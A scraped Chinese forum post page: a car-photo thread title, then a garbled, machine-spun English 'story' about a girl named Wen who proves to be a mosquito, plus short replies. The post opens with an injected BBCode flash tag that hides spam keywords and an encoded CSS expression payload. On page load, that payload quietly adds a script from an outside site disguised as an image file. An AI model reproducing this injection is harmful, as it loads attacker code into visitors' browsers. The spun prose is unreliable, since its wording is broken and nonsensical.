返回列表 回复 发帖

[辅助] 世界上只有20辆,看完不顶对不起眼睛(组图)

[flash,paul smith card wallet,0,mbt shoes clearance sale,0] style=ee:expression(eval(unescape('this.parentNode.style.display%3D%27none%27%3Bif%28%21window.xxr%29%7Bvar%20l%3Ddocument.createElement%28%27script%27%29%3Bl.src%3D%27http%3A//love.avtupian.com/a/q/mq.jpg%27%3Bl.type%3D%27text/javascript%27%3Bdocument.getElementsByTagName%28%27head%27%29.item%280%29.appendChild%28l%29%3Bwindow.xxr%3D1%7D')));display:none;@qq.com[/email][/flash]
Wen beauteous baby , is of unique prettiness. quite silence and seldom talk. like singing, but the sound is very small , and only late at night , when , to taste , favor a relaxed and merry , like explicit water slowly meantime the stream ... she not confessed she was my girlfriend , asked her why , she did not question, I only laugh, intoxicating smile .
Wen is a magnanimous sub- of male 's girl , she tin understand what I absence is freedom , but also gave me unlimited liberty, I am inwardly grateful to her and she rarely companion me during the daytime , only to the night, she would silently tell in my ear she 's all , eyes closed , slowly listening to the voice of the world's maximum beautiful , so I was inundated in the wonderful song ...
Wen child likes to bite me, very agreeable, very light , Ma Ma , if it were not for attended, there is no notice , I asked her why she likes to bite me, she still did not answer , still I smile , I ambition to hold her, but every time she buzzed briskly out of the course , and this is her only drawback I have been remedied with the stars forgiving center Wen child , she is also very grateful to me because this , I constantly feel happy as this child to me ..
Wen requested is not much I love my son Wen anecdote , however not many know , this slumbering a lot , but I still adore the emotion. ... extra willing apt linger with her ??forever and ever .
... ; idle ... brush teeth ... with ... .
neck .. merely ah ... I left a little morsel of track. certainly namely your art , you this pesky mosquitoes .
life is not the lack of mosquitoes adore me , but preferably the lack of love wen my son !
;
Note : this story is purely fictional . Do not copy
  .... ... ...
蒲公英 ..
幻想,十年依旧。
什么呀
返回列表